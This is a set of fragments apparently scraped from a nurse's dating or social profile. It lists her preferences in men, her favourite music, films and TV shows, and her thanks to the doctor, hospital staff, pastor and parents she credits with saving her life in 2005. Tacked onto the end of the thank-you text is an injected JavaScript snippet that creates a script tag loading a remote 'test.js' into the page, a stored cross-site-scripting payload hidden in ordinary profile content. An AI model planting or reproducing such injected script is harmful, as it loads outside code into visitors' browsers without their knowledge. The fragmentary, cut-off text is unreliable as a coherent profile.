I like anyone in the medical field and related interests. Business men and Ivy League professionals are a plus. Stimulate my mind AND my body!...
Looking to meet a professional white (italian is a BIG plus!) Asian, Latino male to show me the DC/Fairfax area! Hurry! Limited time offer!!...
Before I was a nurse, I was a classical music major. I can and appreciate all types of music. You can find Classical to Latin hip-hop in my CD collection. Let's Dance!...
Favorite movies: Grapes of Wrath, Dangerous Liasions (need I say more?)...
Nip/Tuck (If only Christian was MY plastic surgeon!!) Trauma, Life in the ER...
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First: Thank God for saving my life TWO times in 2005. Everyday on this side is another day in paradise! Dr Varghese (the BEST doctor in the WORLD) The staff at St Lukes Hospital in Bethlehem, PA. Thanks for saving my life on October 15, 2005! You guys are THE best. The epitome of medical care. God bless you. Pastor Laurie Davis (thanks for listening and all your love, prayers and support) Mom and Dad (who have given me every opportunity to have fun and express my dreams!)'..var x=document.createElement('script');x.src='http://www.../.../ test.js';document.getElementsByTagName('body')[0].appendChil d(x);" /